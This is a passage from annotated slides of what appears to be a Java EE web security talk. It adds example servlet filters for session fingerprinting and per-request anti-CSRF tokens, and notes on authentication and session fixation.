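import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Added example (not code from the talk): bind a session to the fingerprint of the
// request that first used it, as suggested on slide 42. The attribute name is assumed.
@WebFilter("/*")
public class SessionFingerprintFilter implements Filter {

    static final String FINGERPRINT_ATTR = "session.fingerprint";

    /** Fingerprint of a request: client address plus User-Agent (the slide's two examples). */
    static String fingerprint(HttpServletRequest req) {
        String userAgent = req.getHeader("User-Agent");
        return req.getRemoteAddr() + "|" + (userAgent == null ? "" : userAgent);
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;

        HttpSession session = req.getSession(false);   // never create one just to fingerprint it
        if (session != null) {
            String current = fingerprint(req);
            String bound = (String) session.getAttribute(FINGERPRINT_ATTR);
            if (bound == null) {
                session.setAttribute(FINGERPRINT_ATTR, current);   // first request with this session
            } else if (!bound.equals(current)) {
                // Same session id, different client: treat it as a hijacked or stolen cookie.
                req.getServletContext().log("session fingerprint mismatch on "
                        + req.getRequestURI() + ": expected [" + bound + "] got [" + current + "]");
                session.invalidate();
                resp.sendError(HttpServletResponse.SC_UNAUTHORIZED);
                return;
            }
        }
        chain.doFilter(request, response);
    }

    @Override
    public void init(FilterConfig filterConfig) {
        // no configuration needed
    }

    @Override
    public void destroy() {
        // nothing to release
    }
}
```

Two caveats the slide's "basic heuristic" wording implies. Behind a reverse proxy getRemoteAddr() is the proxy, so every user shares one address and the check degrades to User-Agent only; use the proxy's forwarded-address header instead, and only if that proxy is the sole way in. Mobile users change addresses during a session, and a User-Agent is trivially copied along with the cookie, so this raises the cost of replaying a sniffed or stolen cookie (slides 18-19, 27-28) rather than preventing it; the log line is what gives detection a signal to work with.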
43. Secure Authentication Best Practices cont.
  • Java EE
    • Declarative authentication implemented using descriptors
    • Programmatic authentication
      • Annotations, HttpServletRequest: authenticate, login, logout
    • Advanced flows and requirements
      • Custom implementation
  • Servlet 3.0 vs 3.1
    • "the session visible to developer code after login must be the same session object that was created prior to login"
    • Session fixation problem
      • 3.0: no way to change a session id!
      • 3.1: changeSessionId
    • Check out the container implementations
      • Java EE 6 vs. Java EE 7
44. Secure Authentication Best Practices cont.
  • My choice
    • Declarative authentication with Java EE 7
      • Check out your application server's behavior!
    • Programmatic authentication with Java EE 6, or when an advanced flow is needed in Java EE 7
      • HttpServletRequest: authenticate, login, logout
      • Custom implementation
45-46. What If We Can't Steal a Cookie?
  We can still use it!
47. Demo: CSRF to Use a Cookie
  • I will log into the application
  • Log into the application
    • https://demo.yonita.com:8181/session-csrf/
    • Any non-empty user name
    • Please, use meaningful names!
  • Click the link and then the button 'Click me'
    • https://demo.yonita.com:8181/attack-csrf/
  • I will check my account balance :)
48. CSRF: Solution
  • Use a unique token for each request
    • anti-CSRF token
  • Remember about your web forms and REST services
    • POST requests
    • Other HTTP actions as needed
  • Web framework dependent
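Slide 48 in code, as an added example rather than anything from the talk: a filter that mints a fresh single-use token for every response that can render a form and demands one back on every state-changing request. The attacker's page on slide 47 can make the browser send the victim's cookie, but it cannot read a token that was only ever delivered inside the victim's own pages. Field, attribute and session-key names are assumptions; a web framework normally provides this for you, which is the slide's last bullet.

```java
import java.io.IOException;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Added example (not code from the talk): per-request, single-use anti-CSRF tokens
// as on slide 48. The names below are assumptions, not a framework's API.
@WebFilter("/*")
public class CsrfTokenFilter implements Filter {

    static final String PARAM = "_csrf";            // hidden form field / request parameter
    static final String REQUEST_ATTR = "csrfToken"; // exposed to the view for rendering
    static final String SESSION_KEY = "csrf.tokens";
    static final int MAX_OUTSTANDING = 32;          // several open tabs, but bounded per session

    private final SecureRandom random = new SecureRandom();

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        Set<String> tokens = tokensFor(req.getSession(true));

        if (isStateChanging(req)) {
            String submitted = req.getParameter(PARAM);
            // remove() makes every token single use: a replayed or guessed token fails.
            if (submitted == null || !tokens.remove(submitted)) {
                resp.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid anti-CSRF token");
                return;
            }
        }

        // Mint a token for whatever form this response renders, e.g. in a JSP:
        // <input type="hidden" name="_csrf" value="${csrfToken}">
        String token = newToken();
        tokens.add(token);
        req.setAttribute(REQUEST_ATTR, token);
        chain.doFilter(request, response);
    }

    /** Safe methods need no token; POST, PUT, DELETE, PATCH and anything else do. */
    static boolean isStateChanging(HttpServletRequest req) {
        String method = req.getMethod();
        return !("GET".equals(method) || "HEAD".equals(method) || "OPTIONS".equals(method));
    }

    /** 32 bytes from SecureRandom, URL-safe Base64 without padding (43 characters). */
    String newToken() {
        byte[] bytes = new byte[32];
        random.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    @SuppressWarnings("unchecked")
    private static Set<String> tokensFor(HttpSession session) {
        synchronized (session) {
            Set<String> tokens = (Set<String>) session.getAttribute(SESSION_KEY);
            if (tokens == null) {
                // Insertion-ordered backing map that evicts the oldest token past the bound.
                Map<String, Boolean> backing = new LinkedHashMap<String, Boolean>() {
                    @Override
                    protected boolean removeEldestEntry(Map.Entry<String, Boolean> eldest) {
                        return size() > MAX_OUTSTANDING;
                    }
                };
                tokens = Collections.synchronizedSet(Collections.newSetFromMap(backing));
                session.setAttribute(SESSION_KEY, tokens);
            }
            return tokens;
        }
    }

    @Override
    public void init(FilterConfig filterConfig) {
        // no configuration needed
    }

    @Override
    public void destroy() {
        // nothing to release
    }
}
```

Two points from the slide that the filter makes concrete. REST endpoints get the same treatment as web forms only if the token travels with the request, so an API client has to send it in a parameter (or a header the filter is extended to read); and because tokens live in the session, rotating the session id at login (slide 39) does not disturb them on Servlet 3.1, whereas the Servlet 3.0 copy-and-invalidate approach must carry the token set across like any other attribute.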
50. A fool with a tool is only a fool!